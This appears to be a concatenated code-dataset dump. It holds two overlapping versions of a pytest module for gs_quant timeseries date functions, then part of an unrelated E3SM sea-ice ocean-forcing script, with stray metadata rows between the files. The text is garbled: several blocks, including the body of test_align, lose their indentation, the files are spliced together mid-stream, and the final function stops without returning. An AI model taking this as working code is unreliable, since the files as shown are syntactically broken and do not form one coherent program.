    assert_series_equal(weekday(series), pd.Series([0, 1, 2, 3, 4, 5, 6], index=idx), obj="Weekday")
def test_month():
    """month() extracts the calendar month from each index entry."""
    idx = [date(2019, m, 1) for m in range(1, 5)]
    series = pd.Series([1.0, 2.0, 3.0, 4.0], index=idx)
    assert_series_equal(month(series), pd.Series([1, 2, 3, 4], index=idx), obj="Month")
def test_year():
    """year() extracts the calendar year from each index entry."""
    idx = [date(2019 + i, 1, 1 + i) for i in range(4)]
    series = pd.Series([1.0, 2.0, 3.0, 4.0], index=idx)
    assert_series_equal(year(series), pd.Series([2019, 2020, 2021, 2022], index=idx), obj="Year")
def test_quarter():
    """quarter() maps the first month of each quarter to 1..4."""
    # Jan, Apr, Jul, Oct -- the opening month of each quarter.
    idx = [date(2019, 3 * q - 2, 1) for q in range(1, 5)]
    series = pd.Series([1.0, 2.0, 3.0, 4.0], index=idx)
    assert_series_equal(quarter(series), pd.Series([1, 2, 3, 4], index=idx), obj="Quarter")
def test_day_count_fractions():
    """day_count_fractions() yields constant daily fractions under ACT/360 and ACT/365F.

    Fixes: ``np.NaN`` (removed in NumPy 2.0) replaced with ``np.nan``; the
    empty series now has an explicit dtype (bare ``pd.Series([])`` is
    deprecated / dtype-ambiguous in modern pandas).
    """
    dates = [
        date(2019, 1, 1),
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 4),
        date(2019, 1, 5),
        date(2019, 1, 6),
    ]
    # An empty series passes through unchanged.
    x = pd.Series([], dtype=float)
    assert_series_equal(x, day_count_fractions(x))
    x = pd.Series([100.0, 101, 103.02, 100.9596, 100.9596, 102.978792], index=dates)
    result = day_count_fractions(x, DayCountConvention.ACTUAL_360)
    # The function accepts a series or a bare index.
    result2 = day_count_fractions(x.index, DayCountConvention.ACTUAL_360)
    dcf = 1 / 360
    # The first element has no prior date, hence NaN.
    expected = pd.Series([np.nan, dcf, dcf, dcf, dcf, dcf], index=dates)
    assert_series_equal(result, expected, obj="ACT/360")
    assert_series_equal(result2, expected, obj="ACT/360")
    result = day_count_fractions(x, DayCountConvention.ACTUAL_365F)
    dcf = 1 / 365
    expected = pd.Series([np.nan, dcf, dcf, dcf, dcf, dcf], index=dates)
    assert_series_equal(result, expected, obj="ACT/365")
def test_date_range():
    """date_range() slices a series by integer offsets or explicit start/end dates."""
    dates = [
        date(2019, 1, 1),
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 4),
        date(2019, 1, 5),
        date(2019, 1, 6),
    ]
    values = [1.0, 2.0, 3.0, 4.0, 5.0, 7.0]
    # The same data under a plain date index and a DatetimeIndex should behave alike.
    s0 = pd.Series(values, index=dates)
    s1 = pd.Series(values, index=pd.date_range('2019-01-01', periods=6, freq='D'))
    for x in [s0, s1]:
        assert (date_range(x, 0, 0) == x).all()
        # Flag=True drops Jan 5/6 2019, a Sat/Sun -- presumably it restricts
        # the range to weekdays (confirm against date_range's signature).
        assert (date_range(x, 0, 0, True) == x.iloc[:-2]).all()
        assert date_range(x, 0, date(2019, 1, 3)).index[-1] == date(2019, 1, 3)
        assert (date_range(x, 0, date(2019, 1, 3)) == x.iloc[:3]).all()
        assert date_range(x, date(2019, 1, 3), date(2019, 1, 6)).index[0] == date(2019, 1, 3)
        assert date_range(x, date(2019, 1, 3), date(2019, 1, 6)).index[-1] == date(2019, 1, 6)
        assert (date_range(x, date(2019, 1, 3), date(2019, 1, 6)) == x.iloc[2:6]).all()
    # 2020-10-23 is a Friday: with the flag set, offsets skip the weekend.
    y = pd.Series(values, index=pd.date_range('2020-10-23', periods=6, freq='D'))
    assert (date_range(y, 1, 1, True) == y.iloc[3:5]).all()
    # A single-element series cannot be offset-sliced.
    with pytest.raises(MqValueError):
        date_range(pd.Series([1]), 0, 0)
    # The flag must be a bool, not a string.
    with pytest.raises(MqTypeError):
        date_range(pd.Series([1]), 0, 0, 'string')
def test_prepend():
    """prepend() keeps the head of each series until the next one begins."""
    daily = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 7.0], index=pd.date_range('2019-01-01', "2019-01-06"))
    daily_patch = pd.Series([3.1, 4.1, 5.1], index=pd.date_range('2019-01-03', '2019-01-05'))
    # Degenerate inputs: no series, and a single series.
    assert_series_equal(prepend([]), pd.Series(dtype='float64'), obj='prepend empty')
    assert_series_equal(prepend([daily]), daily, obj='prepend one series')
    # The later series takes over from its first timestamp onward.
    combined = prepend([daily, daily_patch])
    expected = pd.Series([1.0, 2.0, 3.1, 4.1, 5.1], index=pd.date_range('2019-01-01', '2019-01-05'))
    assert_series_equal(combined, expected, obj='prepend two series')
    # Same behaviour on intraday (hourly) indices.
    hourly = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 7.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
    hourly_patch = pd.Series([3.1, 4.1, 5.1], index=pd.date_range('2019-01-01 02:00', periods=3, freq='H'))
    combined = prepend([hourly, hourly_patch])
    expected = pd.Series([1.0, 2.0, 3.1, 4.1, 5.1], index=pd.date_range('2019-01-01', periods=5, freq='H'))
    assert_series_equal(combined, expected, obj='prepend two real-time series')
def test_union():
    """union() merges series with earlier list entries taking precedence."""
    x = pd.Series([3.1, 4.1, np.nan], index=pd.date_range('2019-01-03', '2019-01-05'))
    y = pd.Series([1.0, np.nan, 3.0, 4.0, 5.0, 6.0], index=pd.date_range('2019-01-01', "2019-01-06"))
    z = pd.Series([60.0, 70.0], index=pd.date_range('2019-01-06', "2019-01-07"))
    assert_series_equal(union([]), pd.Series(dtype='float64'), obj='union empty')
    # Drop the index freq so the single-series result compares equal.
    x.index.freq = None
    assert_series_equal(union([x]), x, obj='union of one series')
    # x wins on 01-03/01-04; its NaN on 01-05 falls through to y's 5.0,
    # and z only contributes 01-07, which no earlier series covers.
    actual = union([x, y, z])
    expected = pd.Series([1.0, np.nan, 3.1, 4.1, 5.0, 6.0, 70], index=pd.date_range('2019-01-01', '2019-01-07'))
    assert_series_equal(actual, expected, obj='union of three series')
    # Same precedence rules on intraday (hourly) indices.
    x = pd.Series([3.1, 4.1, np.nan], index=pd.date_range('2019-01-01 02:00', periods=3, freq='H'))
    y = pd.Series([1.0, np.nan, 3.0, 4.0, 5.0, 6.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
    actual = union([x, y])
    expected = pd.Series([1.0, np.nan, 3.1, 4.1, 5.0, 6.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
    assert_series_equal(actual, expected, obj='union of two real-time series')
def test_bucketize():
    """bucketize() aggregates a business-day series into monthly maxima."""
    dates = pd.bdate_range(start='1/1/2021', end='4/23/2021')
    series = pd.Series(range(len(dates)), index=dates)
    actual = bucketize(series, AggregateFunction.MAX, AggregatePeriod.MONTH)
    # Month-end labels; each value is the largest ordinal falling in that month.
    expected_index = pd.DatetimeIndex([date(2021, 1, 31), date(2021, 2, 28), date(2021, 3, 31), date(2021, 4, 30)])
    expected = pd.Series([20, 40, 63, 80], index=expected_index)
    actual.index.freq = None  # Ignore the index freq
    assert_series_equal(actual, expected, check_index_type=False)
def test_day_count():
    """day_count() counts business days between dates and rejects non-dates."""
    cases = [
        (datetime.date(2021, 5, 7), datetime.date(2021, 5, 10), 1),   # Fri -> Mon
        (datetime.date(2021, 5, 10), datetime.date(2021, 5, 14), 4),  # Mon -> Fri
        (datetime.date(2021, 5, 10), datetime.date(2021, 5, 17), 5),  # Mon -> next Mon
    ]
    for start, end, expected in cases:
        assert day_count(start, end) == expected
    # A string end date is not accepted.
    with pytest.raises(MqValueError):
        day_count(datetime.date(2021, 5, 7), '2021-05-10')
if __name__ == "__main__":
pytest.main(args=["test_datetime.py"])
| 34.835165 | 115 | 0.617603 |
import pytest
from pandas.testing import assert_series_equal
from gs_quant.timeseries.datetime import *
def test_align():
dates1 = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
]
dates2 = [
date(2019, 1, 2),
date(2019, 1, 4),
date(2019, 1, 6),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0], index=dates1)
y = pd.Series([20.0, 40.0, 60.0], index=dates2)
expectedl = pd.Series([2.0, 4.0], index=[date(2019, 1, 2), date(2019, 1, 4)])
expectedr = pd.Series([20.0, 40.0], index=[date(2019, 1, 2), date(2019, 1, 4)])
result = align(x, y, Interpolate.INTERSECT)
assert_series_equal(result[0], expectedl, obj="Align intersect left")
assert_series_equal(result[1], expectedr, obj="Align intersect left")
result = align(y, x, Interpolate.INTERSECT)
assert_series_equal(result[0], expectedr, obj="Align intersect right")
assert_series_equal(result[1], expectedl, obj="Align intersect right")
union_dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
date(2019, 1, 6),
]
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, np.nan], index=union_dates)
expected2 = pd.Series([np.nan, 20.0, np.nan, 40.0, np.nan, 60.0], index=union_dates)
result = align(x, y, Interpolate.NAN)
assert_series_equal(result[0], expected1, obj="Align NaN left")
assert_series_equal(result[1], expected2, obj="Align NaN left")
result = align(y, x, Interpolate.NAN)
assert_series_equal(result[0], expected2, obj="Align NaN right")
assert_series_equal(result[1], expected1, obj="Align NaN right")
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 0.0], index=union_dates)
expected2 = pd.Series([0.0, 20.0, 0.0, 40.0, 0.0, 60.0], index=union_dates)
result = align(x, y, Interpolate.ZERO)
assert_series_equal(result[0], expected1, obj="Align zero left")
assert_series_equal(result[1], expected2, obj="Align zero left")
result = align(y, x, Interpolate.ZERO)
assert_series_equal(result[0], expected2, obj="Align zero right")
assert_series_equal(result[1], expected1, obj="Align zero right")
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 5.0], index=union_dates)
expected2 = pd.Series([20.0, 20.0, 20.0, 40.0, 40.0, 60.0], index=union_dates)
result = align(x, y, Interpolate.STEP)
assert_series_equal(result[0], expected1, obj="Align step left")
assert_series_equal(result[1], expected2, obj="Align step left")
result = align(y, x, Interpolate.STEP)
assert_series_equal(result[0], expected2, obj="Align step left")
assert_series_equal(result[1], expected1, obj="Align step left")
xp = x.copy()
yp = y.copy()
xp.index = pd.to_datetime(xp.index)
yp.index = pd.to_datetime(yp.index)
up = pd.to_datetime(union_dates)
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, np.nan], index=up)
expected2 = pd.Series([np.nan, 20.0, 30.0, 40.0, 50.0, 60.0], index=up)
result = align(xp, yp, Interpolate.TIME)
assert_series_equal(result[0], expected1, obj="Align time left")
assert_series_equal(result[1], expected2, obj="Align time left")
result = align(yp, xp, Interpolate.TIME)
assert_series_equal(result[0], expected2, obj="Align time right")
assert_series_equal(result[1], expected1, obj="Align time right")
a = pd.Series([0, 100, 110], index=pd.DatetimeIndex(['2019-07-01', '2019-07-08', '2019-07-10']))
b = pd.Series([20, 60, 70], index=pd.DatetimeIndex(['2019-07-02', '2019-07-10', '2019-07-11']))
result = align(a, b, Interpolate.TIME)
u_index = a.index.union(b.index)
assert_series_equal(result[0], pd.Series([0, 100 / 7, 100, 110, np.nan], index=u_index))
assert_series_equal(result[1], pd.Series([np.nan, 20, 50, 60, 70], index=u_index))
result = align(x, 3)
assert_series_equal(result[0], x, obj="Align scalar left")
assert_series_equal(result[1], pd.Series(3, index=dates1), obj="Align scalar left")
result = align(3, x)
assert_series_equal(result[0], pd.Series(3, index=dates1), obj="Align scalar left")
assert_series_equal(result[1], x, obj="Align scalar right")
result = align(1, 2)
assert result[0] == 1
assert result[1] == 2
with pytest.raises(MqValueError):
align(x, x, "None")
def test_interpolate():
    """Exercise interpolate() over matching, subset, and superset date sets
    for every Interpolate mode, plus its error paths."""
    dates = [
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 5),
        date(2019, 1, 7),
    ]
    x = pd.Series([2.0, 3.0, 5.0, 7.0], index=dates)
    # Requesting the series' own dates (as a list, a series, or by default)
    # must return the series unchanged.
    result = interpolate(x, dates)
    assert_series_equal(result, x, obj="Interpolate series by dates")
    result = interpolate(x, x)
    assert_series_equal(result, x, obj="Interpolate series by series dates")
    result = interpolate(x)
    assert_series_equal(result, x, obj="Interpolate series default")
    # A strict subset of the index selects just those points.
    select_dates = [
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 7),
    ]
    result = interpolate(x, select_dates)
    expected = pd.Series([2.0, 3.0, 7.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate subset of dates")
    # A superset of the index: what happens at the extra dates depends on
    # the Interpolate mode, checked one mode at a time below.
    select_dates = [
        date(2019, 1, 1),
        date(2019, 1, 2),
        date(2019, 1, 4),
        date(2019, 1, 5),
        date(2019, 1, 6),
        date(2019, 1, 7),
        date(2019, 1, 8),
    ]
    intersect_dates = [
        date(2019, 1, 2),
        date(2019, 1, 5),
        date(2019, 1, 7),
    ]
    result = interpolate(x, select_dates, Interpolate.INTERSECT)
    expected = pd.Series([2.0, 5.0, 7.0], index=intersect_dates)
    assert_series_equal(result, expected, obj="Interpolate intersect")
    result = interpolate(x, select_dates, Interpolate.NAN)
    expected = pd.Series([np.nan, 2.0, np.nan, 5.0, np.nan, 7.0, np.nan], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate nan")
    result = interpolate(x, select_dates, Interpolate.ZERO)
    expected = pd.Series([0.0, 2.0, 0.0, 5.0, 0.0, 7.0, 0.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate zero")
    result = interpolate(x, select_dates, Interpolate.STEP)
    expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate step dates")
    # A series may be passed as the date argument; only its index is used.
    result = interpolate(x, pd.Series(np.nan, select_dates), Interpolate.STEP)
    expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate step series")
    # Step interpolation when the source series starts with a NaN value.
    xnan = pd.Series([np.nan, 3.0, 5.0, 7.0], index=dates)
    result = interpolate(xnan, select_dates, Interpolate.STEP)
    expected = pd.Series([np.nan, np.nan, np.nan, 5.0, 5.0, 7.0, 7.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate flat nan start")
    # Date objects against a timestamp-indexed series still work.
    x = pd.Series([2.0, 3.0, 5.0, 7.0], index=pd.DatetimeIndex(dates))
    result = interpolate(x, select_dates, Interpolate.STEP)
    expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=pd.DatetimeIndex(select_dates))
    assert_series_equal(result, expected, obj="Interpolate step dates to series with timestamps")
    # Error paths: unknown mode, and step interpolation on an empty series.
    with pytest.raises(MqValueError, match="Unknown intersection type: None"):
        interpolate(x, x, "None")
    with pytest.raises(MqValueError, match="Cannot perform step interpolation on an empty series"):
        interpolate(pd.Series(), select_dates, Interpolate.STEP)
def test_value():
    """value() looks up a single point, applying the requested interpolation
    mode when the date falls between observations."""
    idx = [date(2019, 1, d) for d in (2, 3, 5, 7)]
    series = pd.Series([2.0, 3.0, 5.0, 7.0], index=idx)
    # Exact index hits need no interpolation.
    assert value(series, date(2019, 1, 3)) == 3.0
    assert value(series, date(2019, 1, 5)) == 5.0
    # A date inside a gap, under each interpolation mode.
    missing = date(2019, 1, 4)
    assert value(series, missing) == 3.0
    assert value(series, missing, Interpolate.INTERSECT) is None
    assert value(series, missing, Interpolate.STEP) == 3.0
    assert value(series, missing, Interpolate.ZERO) == 0.0
    assert np.isnan(value(series, missing, Interpolate.NAN))
def test_day():
    """day() extracts the day-of-month from a date-indexed series."""
    idx = [date(2019, 1, n) for n in range(1, 5)]
    series = pd.Series([1.0, 2.0, 3.0, 4.0], index=idx)
    assert_series_equal(day(series), pd.Series([1, 2, 3, 4], index=idx), obj="Day")
def test_weekday():
    """weekday() maps dates to 0 (Monday) .. 6 (Sunday)."""
    # 2019-01-07 is a Monday, so a full week maps onto 0..6 in order.
    idx = [date(2019, 1, n) for n in range(7, 14)]
    series = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0], index=idx)
    expected = pd.Series([0, 1, 2, 3, 4, 5, 6], index=idx)
    assert_series_equal(weekday(series), expected, obj="Weekday")
def test_month():
    """month() extracts the calendar month number from the index."""
    idx = [date(2019, m, 1) for m in (1, 2, 3, 4)]
    series = pd.Series([1.0, 2.0, 3.0, 4.0], index=idx)
    assert_series_equal(month(series), pd.Series([1, 2, 3, 4], index=idx), obj="Month")
def test_year():
    """year() extracts the calendar year from the index."""
    idx = [date(2019 + i, 1, 1 + i) for i in range(4)]
    series = pd.Series([1.0, 2.0, 3.0, 4.0], index=idx)
    expected = pd.Series([2019, 2020, 2021, 2022], index=idx)
    assert_series_equal(year(series), expected, obj="Year")
def test_quarter():
    """quarter() maps the first month of each quarter to 1..4."""
    idx = [date(2019, 3 * q - 2, 1) for q in (1, 2, 3, 4)]
    series = pd.Series([1.0, 2.0, 3.0, 4.0], index=idx)
    assert_series_equal(quarter(series), pd.Series([1, 2, 3, 4], index=idx), obj="Quarter")
def test_day_count_fractions():
    """day_count_fractions() yields per-period year fractions under a given
    day-count convention, accepting either a series or a bare index."""
    dates = [
        date(2019, 1, 1),
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 4),
        date(2019, 1, 5),
        date(2019, 1, 6),
    ]
    # An empty series maps to an empty result.
    x = pd.Series([])
    assert_series_equal(x, day_count_fractions(x))
    x = pd.Series([100.0, 101, 103.02, 100.9596, 100.9596, 102.978792], index=dates)
    # ACT/360: each one-day step is 1/360 of a year; the first element has
    # no prior date, hence NaN.
    result = day_count_fractions(x, DayCountConvention.ACTUAL_360)
    result2 = day_count_fractions(x.index, DayCountConvention.ACTUAL_360)
    dcf = 1 / 360
    expected = pd.Series([np.NaN, dcf, dcf, dcf, dcf, dcf], index=dates)
    assert_series_equal(result, expected, obj="ACT/360")
    assert_series_equal(result2, expected, obj="ACT/360")
    # ACT/365 (fixed): each one-day step is 1/365.
    result = day_count_fractions(x, DayCountConvention.ACTUAL_365F)
    dcf = 1 / 365
    expected = pd.Series([np.NaN, dcf, dcf, dcf, dcf, dcf], index=dates)
    assert_series_equal(result, expected, obj="ACT/365")
def test_date_range():
    """date_range() slices a series by integer offsets or explicit dates,
    optionally restricting to business days."""
    dates = [
        date(2019, 1, 1),
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 4),
        date(2019, 1, 5),
        date(2019, 1, 6),
    ]
    values = [1.0, 2.0, 3.0, 4.0, 5.0, 7.0]
    s0 = pd.Series(values, index=dates)
    s1 = pd.Series(values, index=pd.date_range('2019-01-01', periods=6, freq='D'))
    # Same expectations whether the index holds dates or timestamps.
    for x in [s0, s1]:
        assert (date_range(x, 0, 0) == x).all()
        # Business-day flag drops the trailing Sat/Sun (Jan 5/6, 2019).
        assert (date_range(x, 0, 0, True) == x.iloc[:-2]).all()
        assert date_range(x, 0, date(2019, 1, 3)).index[-1] == date(2019, 1, 3)
        assert (date_range(x, 0, date(2019, 1, 3)) == x.iloc[:3]).all()
        assert date_range(x, date(2019, 1, 3), date(2019, 1, 6)).index[0] == date(2019, 1, 3)
        assert date_range(x, date(2019, 1, 3), date(2019, 1, 6)).index[-1] == date(2019, 1, 6)
        assert (date_range(x, date(2019, 1, 3), date(2019, 1, 6)) == x.iloc[2:6]).all()
    # 2020-10-23 is a Friday, so business-day offsets skip the weekend.
    y = pd.Series(values, index=pd.date_range('2020-10-23', periods=6, freq='D'))
    assert (date_range(y, 1, 1, True) == y.iloc[3:5]).all()
    # Error paths: non-date index, and a non-bool business-day flag.
    with pytest.raises(MqValueError):
        date_range(pd.Series([1]), 0, 0)
    with pytest.raises(MqTypeError):
        date_range(pd.Series([1]), 0, 0, 'string')
def test_prepend():
    """prepend() splices series: each later series replaces the earlier one
    from its own first index onward."""
    x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 7.0], index=pd.date_range('2019-01-01', "2019-01-06"))
    y = pd.Series([3.1, 4.1, 5.1], index=pd.date_range('2019-01-03', '2019-01-05'))
    # Degenerate inputs: no series, and a single series.
    assert_series_equal(prepend([]), pd.Series(dtype='float64'), obj='prepend empty')
    assert_series_equal(prepend([x]), x, obj='prepend one series')
    actual = prepend([x, y])
    expected = pd.Series([1.0, 2.0, 3.1, 4.1, 5.1], index=pd.date_range('2019-01-01', '2019-01-05'))
    assert_series_equal(actual, expected, obj='prepend two series')
    # Intraday (hourly) indices behave the same way.
    x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 7.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
    y = pd.Series([3.1, 4.1, 5.1], index=pd.date_range('2019-01-01 02:00', periods=3, freq='H'))
    actual = prepend([x, y])
    expected = pd.Series([1.0, 2.0, 3.1, 4.1, 5.1], index=pd.date_range('2019-01-01', periods=5, freq='H'))
    assert_series_equal(actual, expected, obj='prepend two real-time series')
def test_union():
    """union() merges series onto the union of their indices, with earlier
    series taking precedence and NaNs filled from later ones."""
    x = pd.Series([3.1, 4.1, np.nan], index=pd.date_range('2019-01-03', '2019-01-05'))
    y = pd.Series([1.0, np.nan, 3.0, 4.0, 5.0, 6.0], index=pd.date_range('2019-01-01', "2019-01-06"))
    z = pd.Series([60.0, 70.0], index=pd.date_range('2019-01-06', "2019-01-07"))
    assert_series_equal(union([]), pd.Series(dtype='float64'), obj='union empty')
    # Clear the inferred freq before comparing (presumably union() drops it).
    x.index.freq = None
    assert_series_equal(union([x]), x, obj='union of one series')
    actual = union([x, y, z])
    expected = pd.Series([1.0, np.nan, 3.1, 4.1, 5.0, 6.0, 70], index=pd.date_range('2019-01-01', '2019-01-07'))
    assert_series_equal(actual, expected, obj='union of three series')
    # Intraday (hourly) indices behave the same way.
    x = pd.Series([3.1, 4.1, np.nan], index=pd.date_range('2019-01-01 02:00', periods=3, freq='H'))
    y = pd.Series([1.0, np.nan, 3.0, 4.0, 5.0, 6.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
    actual = union([x, y])
    expected = pd.Series([1.0, np.nan, 3.1, 4.1, 5.0, 6.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
    assert_series_equal(actual, expected, obj='union of two real-time series')
def test_bucketize():
    """bucketize() aggregates a daily series into calendar buckets with the
    given aggregate function (here: monthly maxima of business days)."""
    dates = pd.bdate_range(start='1/1/2021', end='4/23/2021')
    series = pd.Series(range(len(dates)), index=dates)
    actual = bucketize(series, AggregateFunction.MAX, AggregatePeriod.MONTH)
    expected_index = pd.DatetimeIndex([date(2021, 1, 31), date(2021, 2, 28), date(2021, 3, 31), date(2021, 4, 30)])
    expected = pd.Series([20, 40, 63, 80], index=expected_index)
    # Normalise the freq so only values and labels are compared.
    actual.index.freq = None
    assert_series_equal(actual, expected, check_index_type=False)
def test_day_count():
    """day_count() counts business days between two dates and rejects
    non-date arguments."""
    # 2021-05-07 is a Friday: Fri->Mon spans a single business day.
    assert day_count(datetime.date(2021, 5, 7), datetime.date(2021, 5, 10)) == 1
    assert day_count(datetime.date(2021, 5, 10), datetime.date(2021, 5, 14)) == 4
    # Mon->Mon across a weekend: five business days.
    assert day_count(datetime.date(2021, 5, 10), datetime.date(2021, 5, 17)) == 5
    with pytest.raises(MqValueError):
        day_count(datetime.date(2021, 5, 7), '2021-05-10')
# Allow running this test module directly via `python <file>`.
if __name__ == "__main__":
    pytest.main(args=["test_datetime.py"])
| true | true |
f725d794e1c2ea3a0dadaac39e0ba98d95db8820 | 11,101 | py | Python | components/mpas-seaice/testing_and_setup/forcing/create_ocean_forcing.py | Fa-Li/E3SM | a91995093ec6fc0dd6e50114f3c70b5fb64de0f0 | [
"zlib-acknowledgement",
"FTL",
"RSA-MD"
] | 235 | 2018-04-23T16:30:06.000Z | 2022-03-21T17:53:12.000Z | components/mpas-seaice/testing_and_setup/forcing/create_ocean_forcing.py | Fa-Li/E3SM | a91995093ec6fc0dd6e50114f3c70b5fb64de0f0 | [
"zlib-acknowledgement",
"FTL",
"RSA-MD"
] | 2,372 | 2018-04-20T18:12:34.000Z | 2022-03-31T23:43:17.000Z | components/mpas-seaice/testing_and_setup/forcing/create_ocean_forcing.py | Fa-Li/E3SM | a91995093ec6fc0dd6e50114f3c70b5fb64de0f0 | [
"zlib-acknowledgement",
"FTL",
"RSA-MD"
] | 254 | 2018-04-20T20:43:32.000Z | 2022-03-30T20:13:38.000Z | from __future__ import print_function
from netCDF4 import Dataset
import netCDF4
import numpy as np
import os
import sys
import ConfigParser
import math
from scipy.interpolate import griddata
from create_forcing import create_scrip_grid_file, get_mpas_grid_info, create_scrip_file_MPAS, write_scrip_in_file, create_output_times, get_remapping_data
#-------------------------------------------------------------------------------
def latlon_to_xyz(lat, lon):
    """Convert radian (lat, lon) on the unit sphere to Cartesian (x, y, z)."""
    cos_lat = math.cos(lat)
    return cos_lat * math.cos(lon), cos_lat * math.sin(lon), math.sin(lat)
#-------------------------------------------------------------------------------
def xyz_to_latlon(x, y, z):
    """Convert Cartesian (x, y, z) back to radian (lat, lon).

    Points on the polar axis (x == y == 0) get lon = 0 by convention.
    """
    lon = math.atan2(y, x) if (x != 0.0 or y != 0.0) else 0.0
    radius = math.sqrt(x * x + y * y + z * z)
    return math.asin(z / radius), lon
#-------------------------------------------------------------------------------
def create_scrip_file_gx1(filenameScrip, filenameGx1Grid):
    """Write a SCRIP-format grid description of the POP gx1 ocean grid.

    Reads the corner coordinates (ULON/ULAT, radians) from filenameGx1Grid,
    reconstructs the four corners and the centroid of every cell, and hands
    the result to create_scrip_grid_file to produce filenameScrip.

    BUG FIX: the original immediately overwrote filenameGx1Grid with a
    hard-coded local path, silently ignoring the caller's argument; that
    override is removed (the unused KMT read is dropped as well).
    """
    fileIn = Dataset(filenameGx1Grid, "r")
    nx = len(fileIn.dimensions["nx"])
    ny = len(fileIn.dimensions["ny"])
    ULONin = fileIn.variables["ULON"][:]
    ULATin = fileIn.variables["ULAT"][:]
    fileIn.close()
    nCells = nx * ny
    gridDims = [nx, ny]
    # All cells participate in the remapping (no land mask applied here).
    gridImask = np.ones(nCells, dtype="i")
    # Pad the corner arrays by one row/column: column 0 wraps the periodic
    # longitude seam; row 0 extrapolates one degree (pi/180 rad) south.
    ULAT = np.zeros((ny + 1, nx + 1))
    ULON = np.zeros((ny + 1, nx + 1))
    ULAT[1:, 1:] = ULATin[:, :]
    ULON[1:, 1:] = ULONin[:, :]
    ULAT[:, 0] = ULAT[:, -1]
    ULON[:, 0] = ULON[:, -1]
    ULON[0, :] = ULON[1, :]
    ULAT[0, :] = ULAT[1, :] - math.pi / 180.0
    cornerLat = np.zeros((4, nCells))
    cornerLon = np.zeros((4, nCells))
    for i in range(0, nx):
        for j in range(0, ny):
            ii = i + 1
            jj = j + 1
            iCell = ii + nx * (jj - 1) - 1
            # Counter-clockwise corners in padded indices: SW, SE, NE, NW.
            i1 = ii - 1; j1 = jj - 1
            i2 = ii;     j2 = jj - 1
            i3 = ii;     j3 = jj
            i4 = ii - 1; j4 = jj
            cornerLat[0, iCell] = ULAT[j1, i1]
            cornerLat[1, iCell] = ULAT[j2, i2]
            cornerLat[2, iCell] = ULAT[j3, i3]
            cornerLat[3, iCell] = ULAT[j4, i4]
            cornerLon[0, iCell] = ULON[j1, i1]
            cornerLon[1, iCell] = ULON[j2, i2]
            cornerLon[2, iCell] = ULON[j3, i3]
            cornerLon[3, iCell] = ULON[j4, i4]
    centerLat = np.zeros(nCells)
    centerLon = np.zeros(nCells)
    for i in range(0, nx):
        for j in range(0, ny):
            ii = i + 1
            jj = j + 1
            iCell = ii + nx * (jj - 1) - 1
            # Cell centre: Cartesian mean of the four corners projected back
            # to the sphere (avoids longitude-wrap averaging artefacts).
            x1, y1, z1 = latlon_to_xyz(cornerLat[0, iCell], cornerLon[0, iCell])
            x2, y2, z2 = latlon_to_xyz(cornerLat[1, iCell], cornerLon[1, iCell])
            x3, y3, z3 = latlon_to_xyz(cornerLat[2, iCell], cornerLon[2, iCell])
            x4, y4, z4 = latlon_to_xyz(cornerLat[3, iCell], cornerLon[3, iCell])
            x0 = 0.25 * (x1 + x2 + x3 + x4)
            y0 = 0.25 * (y1 + y2 + y3 + y4)
            z0 = 0.25 * (z1 + z2 + z3 + z4)
            centerLat[iCell], centerLon[iCell] = xyz_to_latlon(x0, y0, z0)
    create_scrip_grid_file(filenameScrip, nCells, 4, 2, gridDims, centerLat,
                           centerLon, gridImask, cornerLat, cornerLon, "gx1")
#-------------------------------------------------------------------------------
def fill_array(arrayIn):
    """Replace missing values with their nearest valid neighbour, per slice.

    arrayIn has shape (nTimes, nx, ny); values <= -900 are the missing-data
    sentinel.  Each time slice is filled independently by nearest-neighbour
    lookup on the (i, j) grid indices.  Returns a new array; arrayIn is left
    untouched.

    Note: the original also built a 3x-tiled copy of each slice that was
    never read (only column indices < ny were ever used), so that dead work
    is dropped; results are unchanged.
    """
    nTimes, nx, ny = arrayIn.shape
    arrayOut = np.zeros((nTimes, nx, ny))
    arrayOut[:] = arrayIn[:]
    grid_x, grid_y = np.mgrid[0:nx, 0:ny]
    for iTime in range(0, nTimes):
        timeSlice = arrayIn[iTime, :, :]
        good = timeSlice > -900.0
        # Indices/values of valid cells, in the same row-major order the
        # original nested loops produced them (keeps tie-breaking identical).
        pointsGood = np.argwhere(good)
        valuesGood = timeSlice[good]
        # Nearest-neighbour field over the whole slice; valid cells map to
        # themselves, so only the bad cells need copying back.
        filled = griddata(pointsGood, valuesGood, (grid_x, grid_y), method='nearest')
        bad = ~good
        arrayOut[iTime][bad] = filled[bad]
